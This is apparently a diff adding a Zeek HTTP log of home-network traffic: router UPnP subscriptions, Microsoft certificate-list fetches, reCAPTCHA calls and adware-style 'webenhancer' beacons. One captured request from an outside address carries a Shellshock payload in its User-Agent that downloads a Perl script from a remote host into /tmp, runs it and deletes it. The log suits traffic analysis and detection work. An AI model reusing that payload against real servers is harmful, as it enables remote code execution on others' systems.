+{"ts":"2018-08-03T23:38:58.962312Z","uid":"Cyjpr11Z8wYLe2ojyc","id.orig_h":"192.168.0.53","id.orig_p":4946,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANCommonInterfaceConfig","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:58.987675Z","uid":"CEFg9o3bO50X76eX98","id.orig_h":"192.168.0.54","id.orig_p":49756,"id.resp_h":"23.223.41.68","id.resp_p":80,"trans_depth":1,"method":"GET","host":"www.microsoft.com","uri":"/pkiops/crl/MicSecSerCA2011_2011-10-18.crl","user_agent":"Microsoft-CryptoAPI/6.1","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:58.921915Z","uid":"CsgcpN37V9ZSB33Rvl","id.orig_h":"192.168.0.54","id.orig_p":49597,"id.resp_h":"198.199.14.15","id.resp_p":80,"trans_depth":1,"method":"GET","host":"www.wajam.com","uri":"/webenhancer/config?v=d1.4.1.5\u0026os_mj=6\u0026os_mn=1\u0026os_bitness=64\u0026mid=f06847d131a21bb534bd07962f92bd3e\u0026uid=942E7E7368DAADD6C1330C564D1D3954\u0026aid=9860\u0026aid2=none\u0026ts=1426247458\u0026ts2=","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:58.937118Z","uid":"CVx7Jx4NeCD1lqQRR5","id.orig_h":"192.168.0.54","id.orig_p":49622,"id.resp_h":"68.232.34.200","id.resp_p":80,"trans_depth":1,"method":"GET","host":"mscrl.microsoft.com","uri":"/pki/mscorp/crl/msitwww2.crl","user_agent":"Microsoft-CryptoAPI/6.1","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:42.157050Z","uid":"Cm7Xo4nH7PNY7bEge","id.orig_h":"192.168.0.53","id.orig_p":4855,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANIPConnection","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:42.095604Z","uid":"CvqAzt2hZZlhanzK81","id.orig_h":"192.168.0.53","id.orig_p":4828,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANCommonInterfaceConfig","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:59.126868Z","uid":"CjQSnF2LWqRzff7RRb","id.orig_h":"192.168.0.53","id.orig_p":1296,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANCommonInterfaceConfig","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:12.272660Z","uid":"CsH68C3IZFvgW8SF15","id.orig_h":"192.168.0.53","id.orig_p":1040,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"GET","host":"192.168.0.1","uri":"/serv3.xml","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows NT/5.1)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:59.785334Z","uid":"C4uj5c3sM7tMaNRYG2","id.orig_h":"192.168.0.53","id.orig_p":1739,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANCommonInterfaceConfig","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:59.110046Z","uid":"CPClms3nl3dnoCPBue","id.orig_h":"192.168.0.54","id.orig_p":50033,"id.resp_h":"198.199.14.134","id.resp_p":80,"trans_depth":1,"method":"GET","host":"www.technologieduluth.com","uri":"/webenhancer/injections?v=d1.4.1.5\u0026os_mj=6\u0026os_mn=1\u0026os_bitness=64\u0026mid=f06847d131a21bb534bd07962f92bd3e\u0026uid=942E7E7368DAADD6C1330C564D1D3954\u0026aid=9860\u0026aid2=none\u0026ts=1426247458\u0026ts2=","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:59.736846Z","uid":"C563iAk9G0RwHlaB1","id.orig_h":"192.168.0.53","id.orig_p":1676,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANCommonInterfaceConfig","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:59.307802Z","uid":"CkW0YG1hnIqhAytwb4","id.orig_h":"192.168.0.51","id.orig_p":45016,"id.resp_h":"216.58.209.132","id.resp_p":80,"trans_depth":1,"method":"GET","host":"www.google.com","uri":"/recaptcha/api/reload?c=03AHJ_Vuse3iF43fYAzM5FPIfzqBpCQHXpON0Gfjsc3C4Sc9AJM75GFFbwGf2d4YUAl8WsGGn2LRbi9_83KOPCwWAD0PircdW7mo1Fo6xUMZiU4bf08RJr4ZN2435Cm_wjZ70WDpNBXI8AWeTwWrSePGpJ-oG24vzeVNpr2YvXxYTm-XZKrar_AJCWI32DAqpJFYbzBDcPE5KfA_CXqmk-EEq4RgJuBX_oY3DCfAmZJUuxo3lNsSGnvN15eYEBf3Rh1s8HyAG73nZFedsRB7q-vyC5DR1NGLDtoA\u0026k=6LdzYN4SAAAAAEZIKBG_PKLJlSAaMBMeODFH2jxE\u0026reason=t\u0026type=image\u0026lang=sv\u0026th=,3Syw0d79G94tC0y2WwlwZY4S2v3wAAAAEaAAAAAF2AC7_t7PdnOf4Z9QkDZHo-S7UyNllxAf-gkllmYq0Ze7aG8nM4iSBCAwrJGjU6dtE02_cDukcEwjqPGZA5zaNif4zgM95JRVJt0_9ZJi4vrjmJyS-vl48D5iJ8oryXuxig-IDjK-STnzYu3-Nubv0fZ5zxrnicG0iQaGmFSbvJ2uXlQg2n3D7bUUVlmvrCQ6c6UOe2hyPrkUC7OZMhxJiP89dKK3rZSj9gEhxij72rQ3gJIErPWOlV7QpBr9bA","referrer":"http://www.barracudacentral.org/lookups/lookup-reputation","user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:59.737218Z","uid":"C1NLL33tqhZGnNfeD7","id.orig_h":"192.168.0.53","id.orig_p":1677,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANIPConnection","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:59.298032Z","uid":"CCoeHx44gNBnVEKeij","id.orig_h":"192.168.0.54","id.orig_p":50503,"id.resp_h":"198.199.14.15","id.resp_p":80,"trans_depth":1,"method":"GET","host":"www.wajam.com","uri":"/webenhancer/config?v=d1.4.1.5\u0026os_mj=6\u0026os_mn=1\u0026os_bitness=64\u0026mid=f06847d131a21bb534bd07962f92bd3e\u0026uid=942E7E7368DAADD6C1330C564D1D3954\u0026aid=9860\u0026aid2=none\u0026ts=1426247458\u0026ts2=","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:59.948515Z","uid":"CB64RukVfIjeUnRG2","id.orig_h":"192.168.0.51","id.orig_p":32884,"id.resp_h":"213.155.151.153","id.resp_p":80,"trans_depth":2,"method":"GET","host":"www.google.com","uri":"/recaptcha/api/image?c=03AHJ_VusDEkocM0AjTe9zRjHlssEVKlqz-OkBNzxtVgLBj5-gZK4V8xlj4g1IbaSxr1PogcriZwznMc5c_ZEAhfLy_On_GzbGxvACeegUpMsNntIi0IyZ2UuGVajL6Cu3AdCKN7GQR92ObXCRHdQmuormeftBoqP4zJuO85tCBtfTiq6N1Hm52Rjd5gXgzkuXf3ZRAwKc-f5WQQk1tD7V1DTjxLIKSidD_7qnE-6AR46qwBUBwRYvpCXdFakpXWXlvuKyrYW_188tPyhOyVY9MSfNoGeWKr20JA\u0026th=,v06w0d79G94tC0y2WwlwZY4S2v3wAAAAEaAAAAAD2AC7_t7PdnOf4Z9QkDZHo-S7UyNllxAf-gkllmYq0Ze7aG8nM4iSBCAwrJGjU6dtE02_cDukcEwjqPGZA5zaNif4zgM95JRVJt0_9ZJi4vrjmJyS-vl48D5iJ8oryXuxig-IDjK-STnzYu3-Nubv0fZ5zxrnicG0iQaGmFSbvJ2uXlQg2n3D7bUUVlmvrCQ6c6UOe2hyPrkUC7OZMhxJiP89dKK3rZSj9gEhxij72rQ3gJeQrPPCwy2BzVmq6A","referrer":"http://www.barracudacentral.org/lookups/lookup-reputation","user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0","request_body_len":0,"response_body_len":0,"tags":[],"resp_fuids":["F5UC5N3tGYJj4TgIXa"]} +{"ts":"2018-08-03T23:38:59.322175Z","uid":"CNIu1O1IH4XYJ08oIc","id.orig_h":"192.168.0.53","id.orig_p":1640,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANCommonInterfaceConfig","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:59.260891Z","uid":"CbXkd64eyNJLTTCP41","id.orig_h":"192.168.0.54","id.orig_p":50378,"id.resp_h":"198.199.14.15","id.resp_p":80,"trans_depth":1,"method":"GET","host":"www.wajam.com","uri":"/webenhancer/config?v=d1.4.1.5\u0026os_mj=6\u0026os_mn=1\u0026os_bitness=64\u0026mid=f06847d131a21bb534bd07962f92bd3e\u0026uid=942E7E7368DAADD6C1330C564D1D3954\u0026aid=9860\u0026aid2=none\u0026ts=1426247458\u0026ts2=","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:46.354653Z","uid":"CWZydX2qYqyuRPrtT2","id.orig_h":"192.168.0.53","id.orig_p":1887,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANIPConnection","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:59.857346Z","uid":"CgY9w24rFn3M8Gvnli","id.orig_h":"192.168.0.53","id.orig_p":1911,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANIPConnection","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:59.822120Z","uid":"CXRKsa1RZCY1msx1nj","id.orig_h":"188.138.17.205","id.orig_p":33567,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","host":"95.192.215.175","uri":"/","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:59.872799Z","uid":"C6Wuhu27lcxx8Cxc0d","id.orig_h":"192.168.0.53","id.orig_p":1923,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANCommonInterfaceConfig","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:00.003583Z","uid":"CX3tVf14ZtkxCz3z46","id.orig_h":"192.168.0.53","id.orig_p":2088,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANCommonInterfaceConfig","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:00.034561Z","uid":"CvvbHZ37ayj1qajfv7","id.orig_h":"192.168.0.53","id.orig_p":2224,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANIPConnection","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:59.911162Z","uid":"C2IqHu47JZP0JCUSgg","id.orig_h":"192.168.0.54","id.orig_p":51031,"id.resp_h":"23.223.41.68","id.resp_p":80,"trans_depth":1,"method":"GET","host":"www.microsoft.com","uri":"/pkiops/crl/MicSecSerCA2011_2011-10-18.crl","user_agent":"Microsoft-CryptoAPI/6.1","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:00.043322Z","uid":"CTOv961yKH4a1fLKwc","id.orig_h":"192.168.0.53","id.orig_p":2236,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANCommonInterfaceConfig","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:00.068676Z","uid":"CkQqxX2YHojjAFCv0d","id.orig_h":"192.168.0.53","id.orig_p":2260,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANIPConnection","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:00.062859Z","uid":"ChrrOeeyfF64QpKX7","id.orig_h":"192.168.0.54","id.orig_p":51361,"id.resp_h":"198.199.14.134","id.resp_p":80,"trans_depth":1,"method":"GET","host":"www.technologieduluth.com","uri":"/webenhancer/injections?v=d1.4.1.5\u0026os_mj=6\u0026os_mn=1\u0026os_bitness=64\u0026mid=f06847d131a21bb534bd07962f92bd3e\u0026uid=942E7E7368DAADD6C1330C564D1D3954\u0026aid=9860\u0026aid2=none\u0026ts=1426247458\u0026ts2=","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:00.112897Z","uid":"C0wFLy8i18hEfW0vl","id.orig_h":"192.168.0.54","id.orig_p":51454,"id.resp_h":"198.199.14.136","id.resp_p":80,"trans_depth":1,"method":"GET","host":"www.technologieduluth.com","uri":"/webenhancer/injections?v=d1.4.1.5\u0026os_mj=6\u0026os_mn=1\u0026os_bitness=64\u0026mid=f06847d131a21bb534bd07962f92bd3e\u0026uid=942E7E7368DAADD6C1330C564D1D3954\u0026aid=9860\u0026aid2=none\u0026ts=1426247458\u0026ts2=","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:00.163540Z","uid":"CLMtyj12ThgyDW7sLg","id.orig_h":"66.135.38.206","id.orig_p":56959,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","host":"95.192.215.175","uri":"/","user_agent":"() { :;};/usr/bin/perl -e \u0027print \u0022Content-Type: text/plain\u005cr\u005cn\u005cr\u005cnXSUCCESS!\u0022;system(\u0022wget http://ubimed.com/cata.txt -O /tmp/b.pl;curl -O /tmp/b.pl http://ubimed.com/cata.txt;perl /tmp/b.pl;rm -rf /tmp/b.pl*\u0022);\u0027","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:00.231711Z","uid":"CCyWYm3bClVbheGu28","id.orig_h":"192.168.0.54","id.orig_p":51702,"id.resp_h":"198.199.14.136","id.resp_p":80,"trans_depth":1,"method":"GET","host":"www.technologieduluth.com","uri":"/webenhancer/update?v=d1.4.1.5\u0026os_mj=6\u0026os_mn=1\u0026os_bitness=64\u0026mid=f06847d131a21bb534bd07962f92bd3e\u0026uid=942E7E7368DAADD6C1330C564D1D3954\u0026aid=9860\u0026aid2=none\u0026ts=1426247458\u0026ts2=\u0026retry_count=0\u0026retry_version=\u0026sc=1\u0026scfr=\u0026avs=0,0,0,0,0,0,0,0,0,0,0","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:00.258932Z","uid":"Cs1ZnP1mk45GNSnxig","id.orig_h":"192.168.0.54","id.orig_p":51772,"id.resp_h":"198.199.14.136","id.resp_p":80,"trans_depth":1,"method":"GET","host":"www.technologieduluth.com","uri":"/webenhancer/update?v=d1.4.1.5\u0026os_mj=6\u0026os_mn=1\u0026os_bitness=64\u0026mid=f06847d131a21bb534bd07962f92bd3e\u0026uid=942E7E7368DAADD6C1330C564D1D3954\u0026aid=9860\u0026aid2=none\u0026ts=1426247458\u0026ts2=\u0026retry_count=0\u0026retry_version=\u0026sc=1\u0026scfr=\u0026avs=0,0,0,0,0,0,0,0,0,0,0","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:00.251499Z","uid":"Cnnjvl49FTAOZZo3H1","id.orig_h":"192.168.0.53","id.orig_p":2538,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANIPConnection","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:00.222543Z","uid":"CepehI2LVIS8z1i0xd","id.orig_h":"192.168.0.53","id.orig_p":2500,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANCommonInterfaceConfig","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:00.243752Z","uid":"Ck1hD425LSAczt4v66","id.orig_h":"192.168.0.54","id.orig_p":51734,"id.resp_h":"198.199.14.136","id.resp_p":80,"trans_depth":1,"method":"GET","host":"www.technologieduluth.com","uri":"/webenhancer/injections?v=d1.4.1.5\u0026os_mj=6\u0026os_mn=1\u0026os_bitness=64\u0026mid=f06847d131a21bb534bd07962f92bd3e\u0026uid=942E7E7368DAADD6C1330C564D1D3954\u0026aid=9860\u0026aid2=none\u0026ts=1426247458\u0026ts2=","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:00.491853Z","uid":"C9k11f13qx3GnT5H58","id.orig_h":"192.168.0.53","id.orig_p":2961,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANIPConnection","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:00.876604Z","uid":"CN0pgc1qEaXcE1V8Rg","id.orig_h":"192.168.0.54","id.orig_p":52483,"id.resp_h":"80.239.237.10","id.resp_p":80,"trans_depth":5,"method":"GET","host":"crl.microsoft.com","uri":"/pki/crl/products/microsoftrootcert.crl","user_agent":"Microsoft-CryptoAPI/6.1","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:00.876604Z","uid":"CN0pgc1qEaXcE1V8Rg","id.orig_h":"192.168.0.54","id.orig_p":52483,"id.resp_h":"80.239.237.10","id.resp_p":80,"trans_depth":4,"method":"GET","host":"crl.microsoft.com","uri":"/pki/crl/products/WinPCA.crl","user_agent":"Microsoft-CryptoAPI/6.1","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:00.876604Z","uid":"CN0pgc1qEaXcE1V8Rg","id.orig_h":"192.168.0.54","id.orig_p":52483,"id.resp_h":"80.239.237.10","id.resp_p":80,"trans_depth":2,"method":"GET","host":"crl.microsoft.com","uri":"/pki/crl/products/MicCodSigPCA_08-31-2010.crl","user_agent":"Microsoft-CryptoAPI/6.1","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:00.876604Z","uid":"CN0pgc1qEaXcE1V8Rg","id.orig_h":"192.168.0.54","id.orig_p":52483,"id.resp_h":"80.239.237.10","id.resp_p":80,"trans_depth":3,"method":"GET","host":"crl.microsoft.com","uri":"/pki/crl/products/CodeSigPCA.crl","user_agent":"Microsoft-CryptoAPI/6.1","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:00.358242Z","uid":"C3hPjBUMwGV77F0Hc","id.orig_h":"192.168.0.51","id.orig_p":47661,"id.resp_h":"173.194.40.242","id.resp_p":80,"trans_depth":1,"method":"GET","host":"www.google.com","uri":"/recaptcha/api/reload?c=03AHJ_VusBAL-nncOLluAPdyZCRbMoKI9aonvzTpFaCWNBvHlGeldVfUHxQl7zQLKFCtB-_bdldhyqVOXaf8BggIl6W1qQlQiZpyWordgqIHJRmn9x0QYGUA3z-X_e8pdrZICx0HTVkEzzb_p3rlaUrZDGd3z04VLbYJNsGG5eMmH2cpbdpAX7BSG_u-2v0tvGBncEdeZiIu4kTdI5xoWmhI_bc2JKpC1cRrCHqwJoDMD5GcwKPKmy0UvurZcGKn4YHuoMASVtCkPnIp_9aSkg5qNW7Mkd16g4iQ\u0026k=6LdzYN4SAAAAAEZIKBG_PKLJlSAaMBMeODFH2jxE\u0026reason=t\u0026type=image\u0026lang=sv\u0026th=,lWSw0d79G94tC0y2WwlwZY4S2v3wAAAAEaAAAAAE2AC7_t7PdnOf4Z9QkDZHo-S7UyNllxAf-gkllmYq0Ze7aG8nM4iSBCAwrJGjU6dtE02_cDukcEwjqPGZA5zaNif4zgM95JRVJt0_9ZJi4vrjmJyS-vl48D5iJ8oryXuxig-IDjK-STnzYu3-Nubv0fZ5zxrnicG0iQaGmFSbvJ2uXlQg2n3D7bUUVlmvrCQ6c6UOe2hyPrkUC7OZMhxJiP89dKK3rZSj9gEhxij72rQ3gJR9rP5q477qmOYjOg","referrer":"http://www.barracudacentral.org/lookups/lookup-reputation","user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:00.452720Z","uid":"C9pOhvgpYirEG7Gpj","id.orig_h":"192.168.0.53","id.orig_p":2921,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANCommonInterfaceConfig","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:00.515139Z","uid":"Ceku0R2Qb8QuVY7v6i","id.orig_h":"192.168.0.53","id.orig_p":2987,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANIPConnection","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:00.369389Z","uid":"CYzrXBNofYHu4hyjk","id.orig_h":"192.168.0.53","id.orig_p":2661,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANIPConnection","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:00.920246Z","uid":"CGfzNu1GAuXwPAtDga","id.orig_h":"192.168.0.53","id.orig_p":3301,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANIPConnection","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:00.437141Z","uid":"CIP8rT1zKsmJU0pdTa","id.orig_h":"192.168.0.53","id.orig_p":2896,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANCommonInterfaceConfig","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:00.339829Z","uid":"CJ0PUT2yETz53w2vA2","id.orig_h":"192.168.0.54","id.orig_p":51957,"id.resp_h":"23.78.127.162","id.resp_p":80,"trans_depth":1,"method":"GET","host":"www.microsoft.com","uri":"/pkiops/crl/MicSecSerCA2011_2011-10-18.crl","user_agent":"Microsoft-CryptoAPI/6.1","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:00.439707Z","uid":"C8SYqG1u8aVsCyCQBa","id.orig_h":"192.168.0.51","id.orig_p":47691,"id.resp_h":"173.194.40.242","id.resp_p":80,"trans_depth":1,"method":"GET","host":"www.google.com","uri":"/recaptcha/api/reload?c=03AHJ_Vuvc48SfJbuQ-d4pgsJLT3j_483pQCSEvCjAaWx4fGqN_vSImYSgP-Hj28McOL5VGlJI02UOtzyl_clue5PtdWgD4Ny2Siiujwm4Gt4lQBAiVrCd3nUfVDsyQcYDyldjwNxlkhZz1fppGJx0CPUZ63TTnGYR72TugbWiJ5BBvzX9Jaouowd_tjl25qO569aWxXuNZZS35jbmLbpauoqfQNzQtDblw8SbIU4VU3JUPcKTM3wrvMYg8xJKqHzX70ku8nS9c-v1BuWuoQVnIKIWm3ntxrHJgQ\u0026k=6LdzYN4SAAAAAEZIKBG_PKLJlSAaMBMeODFH2jxE\u0026reason=t\u0026type=image\u0026lang=sv\u0026th=,9waw0d79G94tC0y2WwlwZY4S2v3wAAAAEaAAAAAE2AC7_t7PdnOf4Z9QkDZHo-S7UyNllxAf-gkllmYq0Ze7aG8nM4iSBCAwrJGjU6dtE02_cDukcEwjqPGZA5zaNif4zgM95JRVJt0_9ZJi4vrjmJyS-vl48D5iJ8oryXuxig-IDjK-STnzYu3-Nubv0fZ5zxrnicG0iQaGmFSbvJ2uXlQg2n3D7bUUVlmvrCQ6c6UOe2hyPrkUC7OZMhxJiP89dKK3rZSj9gEhxij72rQ3gJR9rP7vagq2RDvJ-A","referrer":"http://www.barracudacentral.org/lookups/lookup-reputation","user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:00.835412Z","uid":"CqzE5K2f2cVW861p68","id.orig_h":"192.168.0.53","id.orig_p":3038,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANIPConnection","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:00.928659Z","uid":"CsyuRS1Ms4Gxy2qMrl","id.orig_h":"192.168.0.53","id.orig_p":3313,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANCommonInterfaceConfig","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:01.050208Z","uid":"Cenb012rhNoyegd7Eh","id.orig_h":"192.168.0.53","id.orig_p":3454,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANCommonInterfaceConfig","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:01.090772Z","uid":"C3TjP83xzICpDF0iSh","id.orig_h":"192.168.0.51","id.orig_p":37330,"id.resp_h":"93.184.220.29","id.resp_p":80,"trans_depth":1,"method":"POST","host":"ocsp.digicert.com","uri":"/","user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0","request_body_len":83,"response_body_len":0,"tags":[],"orig_fuids":["Fxbgtz1AeBbdrL4OOb"],"orig_mime_types":["application/ocsp-request"]} +{"ts":"2018-08-03T23:39:01.073587Z","uid":"C71xbQ3GMrABViKpLh","id.orig_h":"61.160.195.10","id.orig_p":2786,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":2,"method":"GET","host":"95.192.215.175","uri":"/css.txt","user_agent":"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)","request_body_len":0,"response_body_len":0,"tags":[],"resp_fuids":["FnmQEy2Zt9IPguYT6g"]} +{"ts":"2018-08-03T23:39:01.109920Z","uid":"CuveWh275tCkFW9q1d","id.orig_h":"192.168.0.53","id.orig_p":3513,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANCommonInterfaceConfig","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 